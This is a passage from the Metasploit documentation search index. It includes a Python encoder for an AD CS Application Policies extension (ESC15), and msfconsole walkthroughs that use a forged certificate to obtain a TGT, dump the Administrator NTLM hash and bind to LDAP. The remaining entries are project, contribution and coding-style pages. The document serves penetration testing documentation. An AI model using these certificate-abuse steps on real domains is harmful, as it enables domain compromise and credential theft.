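        length, pos = int.from_bytes(data[pos:pos + count], 'big'), pos + count
    return tag, data[pos:pos + length], pos + length


def decode_oid(payload):
    # Inverse of encode_oid (first byte split as 40*a + b, enough for OIDs under 0, 1 and 2.0-2.39).
    arcs = [payload[0] // 40, payload[0] % 40]
    value = 0
    for byte in payload[1:]:
        value = (value << 7) | (byte & 0x7F)
        if not byte & 0x80:
            arcs.append(value)
            value = 0
    return '.'.join(str(a) for a in arcs)


def policies_from_extension(ext):
    # Parse the extension back into its policy OIDs; rejects any other extension.
    tag, body, _ = read_tlv(ext, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError('extension is not a SEQUENCE')
    tag, oid_bytes, pos = read_tlv(body, 0)
    if tag != TAG_OID or decode_oid(oid_bytes) != OID_APPLICATION_CERT_POLICIES:
        raise ValueError('not an Application Policies extension')
    _, value, _ = read_tlv(body, pos)
    _, seq, _ = read_tlv(value, 0)
    oids, pos = [], 0
    while pos < len(seq):
        _, info, pos = read_tlv(seq, pos)
        _, oid_bytes, _ = read_tlv(info, 0)
        oids.append(decode_oid(oid_bytes))
    return oids


if __name__ == '__main__':
    ext = application_policies_extension([OID_CLIENT_AUTH])
    print(ext.hex())
    print(policies_from_extension(ext))
```

Nothing in the encoded extension refers to the template: the policy OIDs are whatever the requester chose, which is the point the walkthrough makes about schema version 1 templates, where the CA honours these request-supplied OIDs in the issued certificate.",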
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc15",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc15"
  },"26": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Authenticating With A Certificate",
    "content": "Metasploit supports authenticating with certificates in a couple of different ways. These techniques can be used to take further actions once a certificate has been issued for a particular identity (such as a Domain Admin user). ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#authenticating-with-a-certificate",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#authenticating-with-a-certificate"
  },"27": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Authenticating To Kerberos",
    "content": "Certificates can be used to authenticate to Kerberos using the kerberos/get_ticket module by specifying the CERT_FILE option. Take the certificate file from the last stage of the attack and set it as the CERT_FILE. Certificates from Metasploit do not require a password, but if the certificate was generated from a source that added one, it can be specified in the CERT_PASSWORD option. Set the RHOST to the Domain Controller which is the Key Distribution Center (KDC) for the Active Directory environment. Getting An NT Hash . Certificates can be used to obtain the NTLM hash of an account with the PKINIT extension. To request the hash, set the action to GET_HASH. msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; get_hash rhosts=172.30.239.85 cert_file=/home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx [*] Running module against 172.30.239.85 [+] 172.30.239.85:88 - Received a valid TGT-Response [*] 172.30.239.85:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230505094204_default_172.30.239.85_mit.kerberos.cca_324339.bin [*] 172.30.239.85:88 - Getting NTLM hash for [email protected] [+] 172.30.239.85:88 - Received a valid TGS-Response [*] 172.30.239.85:88 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230505094204_default_172.30.239.85_mit.kerberos.cca_031414.bin [+] Found NTLM hash for Administrator: aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; . Getting A Kerberos Ticket . Certificates can be used to issue a Kerberos ticket granting ticket (TGT) which in turn can be used to authenticate to services such as HTTP, LDAP and SMB. Ticket granting tickets can be requested using the GET_TGT action. 
msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; get_tgt rhosts=172.30.239.85 cert_file=/home/smcintyre/.msf4/loot/20230124173224_default_172.30.239.85_windows.ad.cs_287833.pfx [*] Running module against 172.30.239.85 [*] 172.30.239.85:88 - Getting TGT for [email protected] [+] 172.30.239.85:88 - Received a valid TGT-Response [*] 172.30.239.85:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230124202354_default_172.30.239.85_mit.kerberos.cca_566767.bin [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; klist Kerberos Cache ============== host principal sname issued status path ---- --------- ----- ------ ------ ---- 172.30.239.85 [email protected] krbtgt/[email protected] 2023-01-24 20:23:54 -0500 valid /home/smcintyre/.msf4/loot/20230124202354_default_172.30.239.85_mit.kerberos.cca_566767.bin msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; . Once the TGT has been issued, it can be seen in the output of the klist command. With the TGT saved, it will automatically be used in future to request service tickets (TGS) for authentication to specific services. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#authenticating-to-kerberos",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#authenticating-to-kerberos"
  },"28": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Authenticating To LDAP",
    "content": "Certificates can also be used to directly authenticate to LDAP using schannel. Metasploit modules that use the builtin LDAP library (including auxiliary/gather/ldap_query) offer this as an authentication option that can be enabled. To use schannel authentication a few options must be set. | LDAP::Auth – must be set to schannel | LDAP::CertFile – must be set to the PFX certificate file with which to authenticate | SSL – must be set to true (schannel authentication is only compatible with TLS connections) | . msf6 auxiliary(gather/ldap_query) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(gather/ldap_query) &amp;gt; set LDAP::Auth schannel LDAP::Auth =&amp;gt; schannel msf6 auxiliary(gather/ldap_query) &amp;gt; set LDAP::CertFile /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx LDAP::CertFile =&amp;gt; /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx msf6 auxiliary(gather/ldap_query) &amp;gt; set SSL true [!] Changing the SSL option's value may require changing RPORT! SSL =&amp;gt; true msf6 auxiliary(gather/ldap_query) &amp;gt; enum_domain [*] Running module against 172.30.239.85 [*] Discovering base DN automatically [+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com [+] 172.30.239.85:389 Discovered schema DN: DC=daforest,DC=com DC=msflab DC=local ================== Name Attributes ---- ---------- lockoutduration 0:00:30:00 lockoutthreshold 0 maxpwdage 42:00:00:00 minpwdage 1:00:00:00 minpwdlength 7 ms-ds-machineaccountquota 10 name msflab objectsid S-1-5-21-3402587289-1488798532-3618296993 [*] Auxiliary module execution completed msf6 auxiliary(gather/ldap_query) &amp;gt; . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#authenticating-to-ldap",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#authenticating-to-ldap"
  },"29": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "content": " ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html"
  },"30": {
    "doc": "Bundled Modules Proposal",
    "title": "Bundled Modules",
    "content": "Created by Adam Cammack . As Metasploit modules continue to grow in number and capability the current separation of module information by type grows more cumbersome. Starting next year, we want all the files related to a module (docs, libraries, sources, build info, etc.) to live as closely together and be as hackable as possible. To this end, we have come up with the concept of “module bundles” to help improve module dependency isolation and locality of information. We hope the format will prove flexible enough to accommodate the wide range of modules we have and uniform enough to not cause confusion among community members and contributors. Eventually, we may even be able to package each module separately for distribution. Whether or not this bundled format will support the old style of module is uncertain. It could be made to work, I think, but it would require a fair bit of effort and ingenuity to work cleanly. For simplicity, I will describe the bundle concept as it applies to external/coldstone modules and then describe potential adaptations at the end. ",
    "url": "/docs/development/propsals/bundled-modules-proposal.html#bundled-modules",
    "relUrl": "/docs/development/propsals/bundled-modules-proposal.html#bundled-modules"
  },"31": {
    "doc": "Bundled Modules Proposal",
    "title": "Directory structure",
    "content": "Example complicated Ruby module: . $ tree --dirsfirst --charset=ascii -F bundled_module/ bundled_module/ |-- data/ | `-- stack_smash |-- docs/ |-- bundled_module.md |-- poc.py | `-- success.pcap |-- lib/ |-- foo/ | |-- bar.rb | `-- baz.rb | `-- foo.rb |-- src/ | `-- stack_smash.s |-- templates/ | `-- exploit.ps.erb |-- Dockerfile |-- Gemfile |-- Gemfile.lock |-- Rakefile |-- bundled_module.rb* `-- metadata.json . ",
    "url": "/docs/development/propsals/bundled-modules-proposal.html#directory-structure",
    "relUrl": "/docs/development/propsals/bundled-modules-proposal.html#directory-structure"
  },"32": {
    "doc": "Bundled Modules Proposal",
    "title": "Aside: things I’m not sure of and reference vaguely",
    "content": ". | Would the main executable be named after the module (same as the directory, maybe with extension), or given a | standard name? | Would the JSON metadata file be named after the module or given a standard name? | Would we ever allow multiple closely related modules per directory? (eg. routersploit integration, impacts how we think about the above) | If so or not, how would we deal with closely related functionality that has different options for different actions? | Do things like client blobs (HTML, JavaScript, images, etc.) belong in data/ or should we also have a static/? (static/ seems to get a bit fiddly to me; data/static/?) | . ",
    "url": "/docs/development/propsals/bundled-modules-proposal.html#aside-things-im-not-sure-of-and-reference-vaguely",
    "relUrl": "/docs/development/propsals/bundled-modules-proposal.html#aside-things-im-not-sure-of-and-reference-vaguely"
  },"33": {
    "doc": "Bundled Modules Proposal",
    "title": "Required files",
    "content": "To keep overhead to a minimum for hackers who are developing modules, we need to minimize files that the author will need to create, touch, and understand for most tasks (restated: every file an author must touch should be directly related to particular and specialized functionality that they want as part of the preparation or execution of a module). The most minimal module only requires the main executable to be present. When loading modules, framework will see a leaf directory without certain expected files and will generate the default ones automatically. This behaviour can later be augmented to guess which defaults to generate based on what is present in the directory. | If Rakefile is absent, framework will generate one that references the shared rake tasks. | If Gemfile is absent and the executable ends in .rb, framework will generate one that depends on the bridge libraries from source. | If metadata.json is absent, framework will generate it using rake. | . All this generation logic should be available as part of a standalone scaffolding tool. ",
    "url": "/docs/development/propsals/bundled-modules-proposal.html#required-files",
    "relUrl": "/docs/development/propsals/bundled-modules-proposal.html#required-files"
  },"34": {
    "doc": "Bundled Modules Proposal",
    "title": "Keeping it all close",
    "content": "One of the drawbacks of the current module system is that all the files related to the development, documentation, and execution of a module live in different places. Some information, like dependencies, is only tracked implicitly or lossily in code or in the top-level specifications of framework. This makes programmatically determining what a module is, targets, or requires fraught with fragile code. Metadata . The metadata will be kept in JSON in a file (or several, see my uncertainties above) that is built by rake. Keeping the metadata cached per-module gives us several capabilities. First, updates look more logical in commits, and the files can be updated as part of the standard PR/landing process. Next, dependency tracking of when the metadata needs to be updated can be offloaded to standard build tool capabilities. Because invoking rake has overhead, any metadata that exists should be considered correct during initial module discovery. Any modules without metadata should then have it generated via rake. Next, every module should have its metadata building task run (and stale metadata replaced) to ensure correctness. If a module is use’d before this process completes, it must have its metadata refreshed via rake if needed as part of the loading process. Since modules are independent, the whole discovery/refreshing process is parallelizable, reducing wall time. In addition to the information we currently cache, we will want to cache any information a user might see or want to know so that, if the cached metadata is more recent than any module files, nothing has to be built or run to use the module. Notably, this includes options and module archetype (which in the future directly map options for user convenience, vs. the shim approach taken today). Build info . All additional build info should be specified as tasks in the module Rakefile. As much as possible, this should also include building with IDE environments, like Visual Studio. 
Even if the binaries are checked in to reduce runtime requirements (see below), it is still invaluable to know how something was built in the first place. Blobs and sources . Sources are handy, so it should be easy to find them! Now they will live in the module in the src/ directory. Here the Rakefile can easily find them and transform them into the beautiful exploitation resources they were meant to be. As much as possible, only sources should be checked into the tree. For super-specific platform targeting things though, that’s not always feasible (eg. VisualStudio projects). It’s times like these that the data/ directory should be used. As mentioned above, the Rakefile should still be able to build the thing given the correct environment. Blobs or assets without a checked-in source also belong in data/, like images or downloaded things. Things for client exploits to download should probably also go in here, like HTML files and static JavaScripts. Templates . Modules that use a large literal interspersed with runtime data should use the templates/ directory to store templates. ERB should be used for printable data by Ruby, and equivalents for other languages (DTL, mustache, etc.). Binary data should maybe be blobs with accompanying offset listings? . Docs . The docs/ directory will contain the files that a user will reference when trying to understand a module. This may include PoCs, markdown, pcaps, etc. The HTML we currently show to users would be generated from the module and files here using rake tasks. Additional tooling . One advantage that this directory structure gives us is the ability to write better tooling for it than we have for the current iteration of modules. One downside is that we will need it in order to make the format accessible to hackers. Shared build tasks . 
Because all routine module-oriented tasks will be performed with rake tasks, we will need to make the default actions for these tasks as intelligent and reusable as possible across different module types/implementations. A module author should not have to worry about writing plumbing they do not need (or is common) or messing with plumbing that is only tangentially related to their unique need. To that end, we should have sane defaults for the following at a minimum: . rake run -- Start module, hook up stdin/stdout to JSON-RPC rake metadata -- Generate metadata JSON rake tidy:code -- Run tidiness checks against the code rake tidy:metadata -- Run tidiness checks against the metadata rake doc:text -- Combine all docs into a plain-text, human readable thing rake doc:html -- Similar to today's info -d rake deps -- Install dependencies local to the current user, if possible rake deps:check -- Check to see if a module can likely be run in the current environment rake build -- Build files that need it, defaults: src/FILE.s =&amp;gt; data/FILE (extracted from exe format), ...? rake clean -- Remove generated files rake clobber -- Reset to pristine, checked-out state . Module generation . At the very least, we will also need tooling to create a mostly-empty but runnable module so that an author knows what to poke when writing. This skeleton can be augmented by questions that can help us use different archetypes, like payload vs. remote, or Ruby vs. Python. These commands could also point the author to relevant module writing articles/documentation. For classic modules . The biggest differences for classic modules are metadata generation and running. These can be accomplished with rake tasks, but it would involve starting up a whole framework instance for each module run. For efficiency, we will need to signal to framework to treat the module specially, perhaps having rake deps:check output/return a specific value when the module needs to be run inside of framework. 
Metadata would then be dumped directly from the framework loader, and instead of rake run, the classic module loader/runner would be run much as it is today. We will probably want to keep the rake tasks for these things for when we don’t already have a framework instance handy. ",
    "url": "/docs/development/propsals/bundled-modules-proposal.html#keeping-it-all-close",
    "relUrl": "/docs/development/propsals/bundled-modules-proposal.html#keeping-it-all-close"
  },"35": {
    "doc": "Bundled Modules Proposal",
    "title": "Bundled Modules Proposal",
    "content": " ",
    "url": "/docs/development/propsals/bundled-modules-proposal.html",
    "relUrl": "/docs/development/propsals/bundled-modules-proposal.html"
  },"36": {
    "doc": "Code Of Conduct",
    "title": "Contributor Code of Conduct",
    "content": "As contributors and maintainers of this project, and in the interest of fostering an open and welcoming community, we pledge to respect all people who contribute through reporting issues, posting feature requests, updating documentation, submitting pull requests or patches, and other activities. We are committed to making participation in this project a harassment-free experience for everyone, regardless of level of experience, gender, gender identity and expression, sexual orientation, disability, personal appearance, body size, race, ethnicity, age, religion, or nationality. Examples of unacceptable behavior by participants include: . | The use of sexualized language or imagery | Personal attacks | Trolling or insulting/derogatory comments | Public or private harassment | Publishing others’ private information, such as physical or electronic addresses, without explicit permission | Other unethical or unprofessional conduct | . Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful. By adopting this Code of Conduct, project maintainers commit themselves to fairly and consistently applying these principles to every aspect of managing this project. Project maintainers who do not follow or enforce the Code of Conduct may be permanently removed from the project team. This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project maintainers at [email protected]. If the incident involves a committer, you may report directly to [email protected] or [email protected]. 
All complaints will be reviewed and investigated and will result in a response that is deemed necessary and appropriate to the circumstances. Maintainers are obligated to maintain confidentiality with regard to the reporter of an incident. This Code of Conduct is adapted from the Contributor Covenant, version 1.3.0, available at http://contributor-covenant.org/version/1/3/0/ . ",
    "url": "/docs/code-of-conduct.html#contributor-code-of-conduct",
    "relUrl": "/docs/code-of-conduct.html#contributor-code-of-conduct"
  },"37": {
    "doc": "Code Of Conduct",
    "title": "Code Of Conduct",
    "content": " ",
    "url": "/docs/code-of-conduct.html",
    "relUrl": "/docs/code-of-conduct.html"
  },"38": {
    "doc": "Committer Keys",
    "title": "Keybase.io identities",
    "content": "Keybase.io is used by Metasploit as an easy way to verify identities of committers. If you’re a committer on metasploit-framework, and you need an invite, just ask. | Github Username | Keybase.io Username | . | @adfoster-r7 | adfosterr7 | . | @bcoles | bcoles | . | @bwatters-r7 | bwatters | . | @ccondon-r7 | catc0n | . | @cdelafuente-r7 | cdelafuente | . | @cgranleese-r7 | &nbsp; | . | @chiggins | chiggins | . | @dwelch-r7 | dwelchr7 | . | @erran-r7 | err7n | . | @ekelly-rapid7 | &nbsp; | . | @FireFart | firefart | . | @Green-m | green-m | . | @gwillcox-r7 | grantwillcox | . | @h00die | h00die | . | @hwilson-r7 | &nbsp; | . | @jharris-r7 | &nbsp; | . | @jheysel-r7 | &nbsp; | . | @jmartin-r7 | jmartinr7 | . | @Meatballs1 | meatballs | . | @mkienow-r7 | inokii | . | @mubix | mubix | . | @nhkaraka-r7 | &nbsp; | . | @OJ | oj | . | @rhodgman-r7 | rhodgmanr7 | . | @scriptjunkie | scriptjunkie | . | @sgonzalez-r7 | essgee | . | @smashery | smashery | . | @smcintyre-r7 | &nbsp; | . | @space-r7 | shelbyp | . | @tas-r7 | &nbsp; | . | @timwr | timwr | . | @todb-r7 | todb | . | @void-in | void_in | . | @zgoldman-r7 | &nbsp; | . Note, keybase.io does not require your private key to prove your GitHub identity. Actually sharing your private key with Keybase.io is a matter of contention – here’s the usual argument against, and here’s one thoughtful argument for. ",
    "url": "/docs/development/maintainers/committer-keys.html#keybaseio-identities",
    "relUrl": "/docs/development/maintainers/committer-keys.html#keybaseio-identities"
  },"39": {
    "doc": "Committer Keys",
    "title": "Tracking criteria",
    "content": "In order to get @smcintyre-r7 to track your key, you alert him to its existence through some non-GitHub means, and verify your GitHub username. That’s all there is to it. It would be sociable to track him (and everyone else on this list) back. Tracking is essentially “trusting” and “verifying” – see the much longer discussion here. ",
    "url": "/docs/development/maintainers/committer-keys.html#tracking-criteria",
    "relUrl": "/docs/development/maintainers/committer-keys.html#tracking-criteria"
  },"40": {
    "doc": "Committer Keys",
    "title": "Signing your commits and merges",
    "content": "Contributors are encouraged to sign commits, while Metasploit committers are required to sign their merge commits. Note that the name and e-mail address must match the information on the signing key exactly. To begin: . | Generate a signing key, if you don’t have one already, using your favorite PGP/GPG interface: | . $ gpg --gen-key gpg (GnuPG) 1.4.20; Copyright (C) 2015 Free Software Foundation, Inc. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Please select what kind of key you want: (1) RSA and RSA (default) (2) DSA and Elgamal (3) DSA (sign only) (4) RSA (sign only) Your selection? 4 RSA keys may be between 1024 and 4096 bits long. What keysize do you want? (2048) Requested keysize is 2048 bits Please specify how long the key should be valid. 0 = key does not expire &amp;lt;n&amp;gt; = key expires in n days &amp;lt;n&amp;gt;w = key expires in n weeks &amp;lt;n&amp;gt;m = key expires in n months &amp;lt;n&amp;gt;y = key expires in n years Key is valid for? (0) 1y Key expires at Fri 20 Dec 2019 01:38:11 PM CST Is this correct? (y/N) y You need a user ID to identify your key; the software constructs the user ID from the Real Name, Comment and Email Address in this form: \"Heinrich Heine (Der Dichter) &amp;lt;[email protected]&amp;gt;\" Real name: Dade Murphy Email address: [email protected] Comment: You selected this USER-ID: \"Dade Murphy &amp;lt;[email protected]&amp;gt;\" Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o You need a Passphrase to protect your secret key. Enter passphrase: [...] . | Modify your .git/config file to enable signing commits and merges by default: | . [user] name = Your Name email = [email protected] signingkey = DEADBEEF # Must match name and email exactly! [alias] c = commit -S --edit m = merge -S --no-ff --edit . Using git c and git m from now on will sign every commit with your DEADBEEF key. 
However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit – to re-sign the most recent one, use git c --amend. ",
    "url": "/docs/development/maintainers/committer-keys.html#signing-your-commits-and-merges",
    "relUrl": "/docs/development/maintainers/committer-keys.html#signing-your-commits-and-merges"
  },"41": {
    "doc": "Committer Keys",
    "title": "Committer Keys",
    "content": "This page lists the keys in use by Metasploit committers and can be used to verify merge commits made to https://github.com/rapid7/metasploit-framework. ",
    "url": "/docs/development/maintainers/committer-keys.html",
    "relUrl": "/docs/development/maintainers/committer-keys.html"
  },"42": {
    "doc": "Committer Rights",
    "title": "Metasploit Committers",
    "content": "The term “Metasploit Committers” describes people who have direct write access to the Rapid7 Metasploit-Framework fork. These are the people who can land changes to this main fork of the Framework. However, it is not necessary to have committer rights in order to contribute to Metasploit. Much of our code comes from non-committers. We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via Pull Requests. The process for getting started is most comprehensively documented in the Metasploit Development Environment setup guide. Metasploit committers are a mix of Rapid7 employees and outside contributors. Anyone can become a contributor, with the following expectations: . | Committers are empowered to participate in code review, help newbies, and be positive role models in the larger development community. | Committers are likely to take up chores such as writing documentation, evangelization, writing test cases, and code review. | Committers help maintain the character of the Metasploit Framework as a truly independent open source project. | . The Metasploit community is built on the core belief that open contributions and open discussion of security issues has strong benefits for the Internet in general and human society as a whole. By helping each other demonstrate security vulnerabilities and exposures, we foster a community of excellent, ethical practitioners of information security. ",
    "url": "/docs/development/maintainers/committer-rights.html#metasploit-committers",
    "relUrl": "/docs/development/maintainers/committer-rights.html#metasploit-committers"
  },"43": {
    "doc": "Committer Rights",
    "title": "How to be a Committer",
    "content": "Committers tend to review pull requests that come in from other committers and from the wider Metasploit community. Committers generally should not land their own code without some sort of review from another contributor or committer. For most changes, please open a pull request. In addition, always ask for someone to review your work. Even simple fixes might be better done otherwise. If you get no feedback on your pull requests, ask again. Be annoying if necessary! Don’t submit a pull request or make a comment and let it rot because nobody responds. Pull requests should be merged with a git merge -S --no-ff in order to ensure a merge commit is always generated, and your merge commit is signed with your PGP key. Avoid clicking the green “merge” button in Github in order to avoid race conditions with landing code that may sneak past review, and of course, so you can sign your commits. If you reject a pull request, be clear in the pull request why it was rejected, with some effort made to point at helpful resources for next time. Most people don’t often commit to open source code, so when someone does, please be respectful of their efforts. Even if someone else approves of a pull request, and it is shown to be broken later, then it is still your responsibility to correct it. Make every effort to get a fix or revert in as soon as possible, whether you wrote the code, landed it, or approved it. Blame is shared equally. A list of committer public keys is here. ",
    "url": "/docs/development/maintainers/committer-rights.html#how-to-be-a-committer",
    "relUrl": "/docs/development/maintainers/committer-rights.html#how-to-be-a-committer"
  },"44": {
    "doc": "Committer Rights",
    "title": "How to Gain Commit Rights",
    "content": "Commit rights are granted via votes on the committers mailing list. Voting records are archived for the benefit for current and future committers. | Any current committer may nominate any one person as a potential committer by writing to the committers mailing list. | The nominator must provide a justification for committer rights, and include the nominee’s e-mail address. | After some discussion on the mailing list, there will be a group vote on the nominee. | The Metasploit manager (@smcintyre-r7) will inform the new committer of their new commit rights and responsibilities, add the new committer to the appropriate ACL groups and mailing lists, and inform the mailing list of the successful completion of these tasks. | . Committers introduced in this way will have commit rights to the public framework repositories. ",
    "url": "/docs/development/maintainers/committer-rights.html#how-to-gain-commit-rights",
    "relUrl": "/docs/development/maintainers/committer-rights.html#how-to-gain-commit-rights"
  },"45": {
    "doc": "Committer Rights",
    "title": "How to Lose Commit Rights",
    "content": "Committer rights are not granted strictly on the basis of proven code quality; committer rights are a statement of trust by the existing body of committers, so there are highly subjective criteria in play as well. Elements like an agreeable personality, the ability to remain calm in the face of trolling, the avoidance of criminal proceedings, and other aspects of a committer’s life all play a part in the initial granting of commit access. Breaches of trust in terms of malicious or malformed code, or the demonstration of poor judgement that would reflect poorly on the Metasploit project, will lead to a discussion on the committer mailing list, which is likely to result in the removal of committer rights. ",
    "url": "/docs/development/maintainers/committer-rights.html#how-to-lose-commit-rights",
    "relUrl": "/docs/development/maintainers/committer-rights.html#how-to-lose-commit-rights"
  },"46": {
    "doc": "Committer Rights",
    "title": "Useful Links for Committers",
    "content": ". | Setting Up a Metasploit Development Environment is pretty much required reading. | So is CONTRIBUTING.md | Check out the Apache Software Foundation’s Guide for Committers. It’s illuminating. | Producing Open Source Software by Ken Fogel is a must-read. | Zach Holman’s Open Source Misfeasance slides – the video is gone! | How to Survive Poisonous People by Ben Collins-Sussman and Brian Fitzpatrick | The Netiquette RFC is about how to be polite. | . ",
    "url": "/docs/development/maintainers/committer-rights.html#useful-links-for-committers",
    "relUrl": "/docs/development/maintainers/committer-rights.html#useful-links-for-committers"
  },"47": {
    "doc": "Committer Rights",
    "title": "Committer Rights",
    "content": " ",
    "url": "/docs/development/maintainers/committer-rights.html",
    "relUrl": "/docs/development/maintainers/committer-rights.html"
  },"48": {
    "doc": "Common Metasploit Module Coding Mistakes",
    "title": "Deprecation notice!",
    "content": "Please see CONTRIBUTING.md for an authoritative coding guide. This document has fallen out of date. We don’t write bad code any more! Hooray! . This is a collection of all the bad code we often see in Metasploit modules. You should avoid them, too. Note: Some of these examples use puts() for demo purposes, but you should always use print_status / print_error when writing a module. Bad Examples You Should NOT Follow: . | Not checking the return value of a Metasploit API | Ruby 1.9.3 vs 1.8.7… gotcha! | Not checking the return value when using match() | Not checking nil before accessing a method | Using exception handling to shut an error up | Not taking advantage of the ‘ensure’ block | Adding the ‘VERBOSE’ option | Neglecting to use ‘vars_post’ for send_request_cgi() when crafting a POST request | Bad variable naming style | Using global variables | Modifying the datastore during execution | . 1. Not checking the return value of a Metasploit API . res = send_request_cgi({ 'method' =&amp;gt; 'GET', 'uri' =&amp;gt; '/app/index.php' }) # There's a bug here, because res can return nil (due to a timeout or other reasons) # If that happens, you will hit a \"undefined method `code' for nil:NilClass\" error. # The correct way should be: if res &amp;amp;&amp;amp; res.code == 200 if res.code == 200 print_status(\"Response looks good\") else print_error(\"Unexpected response\") end . 2. Ruby 1.9.3 vs 1.8.7… gotcha! . some_string = \"ABC\" # This can cause unexpected results to your module. # Better to always do: char = some_string[1, 1] char = some_string[1] if char == 'B' puts \"You will see this message in Ruby 1.9.3\" elsif char == 66 puts \"You will see this message in Ruby 1.8.7\" end . # 1.9 allows a comma after the last argument when calling # a method while 1.8 does not. The most common place to # see this error is in the update_info() section in a # module's constructor. 
some_method( \"arg1\", \"arg2\", # &amp;lt;-- This comma is a syntax error on 1.8.x ) . 3. Not checking the return value when using match() . str = \"dragon! drag on! Not lizard, I don't do that tongue thing\" # This tries to print \"Not snake\", but it's not in the string, # so you'll get this error: \"undefined method `[]' for nil:NilClass\" puts str.match(/(Not snake)/)[0] . # The above is better written as: if (str =~ /(Not snake)/) puts $1 end . 4. Not checking nil first before accessing a method . str = \"These things are round and tasty, let's call them... tastycles!\" food = str.scan(/donut holes/)[0] # food is nil, and nil has no method called \"empty\". # This will throw an error: \"undefined method `empty?' for nil:NilClass\" if food.empty? or food.nil? puts \"I don't know what it's called\" end . 5. Using exception handling to shut an error up . begin # This block has 2 issues: # Issue #1: sample() is not a method in 1.8.7 # Issue #2: Divided by 0 (race condition) n = [0, 1, 2, 3, 4, 5].sample 1/n rescue # If the user reports a bug saying this code isn't # working, it can be hard to debug exactly what went # wrong for the user without a backtrace. # When you do this, the error also won't be logged in # framework.log, either. # Note that rescuing ::Exception is especially harmful # because it can even hide syntax errors. end . 6. Not taking advantage of the ‘ensure’ block . # You should use the ensure block to make sure x always has a value, # which also avoids repeating code begin n = [0, 1, 2].sample x = 1/n rescue ZeroDivisionError =&amp;gt; e puts \"Are you smarter than a 5th grader? #{e.message}\" x = 0 # Can put this in the ensure block rescue NoMethodError puts \"You must be using an older Ruby\" x = 0 # Can put this in the ensure block end puts \"Value is #{x.to_s}\" . 7. Adding the ‘VERBOSE’ option . register_options( [ # You already have this. Just type 'show advanced' and you'll see it. 
# So no need to register again OptBool.new(\"VERBOSE\", [false, 'Enable detailed status messages', false]) ], self.class) . 8. Neglecting to use send_request_cgi()’s vars_post or vars_get when crafting a POST/GET request . data_post = 'user=jsmith&amp;amp;pass=hello123' # You should use the 'vars_post' key instead of 'data', # unless you're trying to avoid the API escaping your # parameter names send_request_cgi({ 'method' =&amp;gt; 'POST', 'uri' =&amp;gt; '/', 'data' =&amp;gt; data_post }) . 9. Bad variable naming style . # What's this, Java? # The proper naming style in this case should be: my_string myString = \"hello, world\" . 10. Using global variables . # $msg is a global variable that can be accessed anywhere within the program. # This can induce bugs to other modules or mixins that are hard to debug. # Use @instance variables instead. # This is also mentioned in your HACKING file :-) class Opinion def initialize # This variable shouldn't be shared with other classes $msg = \"It's called the Freedom of Information Act. The Hippies finally got something right.\" end end class Metasploit3 def initialize puts $msg end end Opinion.new Metasploit3.new . 11. Modifying the datastore during execution . # https://github.com/rapid7/metasploit-framework/issues/3853 datastore['BAD'] = 'This is bad.' . ",
    "url": "/docs/development/quality/common-metasploit-module-coding-mistakes.html#deprecation-notice",
    "relUrl": "/docs/development/quality/common-metasploit-module-coding-mistakes.html#deprecation-notice"
  },"49": {
    "doc": "Common Metasploit Module Coding Mistakes",
    "title": "Common Metasploit Module Coding Mistakes",
    "content": " ",
    "url": "/docs/development/quality/common-metasploit-module-coding-mistakes.html",
    "relUrl": "/docs/development/quality/common-metasploit-module-coding-mistakes.html"
  },"50": {
    "doc": "Contact",
    "title": "Chat",
    "content": "A lot of our discussion happens on IRC in #metasploit on Freenode. Please be patient and hang around for a while – not everyone is awake at the same time as you. =) . ",
    "url": "/docs/contact.html#chat",
    "relUrl": "/docs/contact.html#chat"
  },"51": {
    "doc": "Contact",
    "title": "Mailing list",
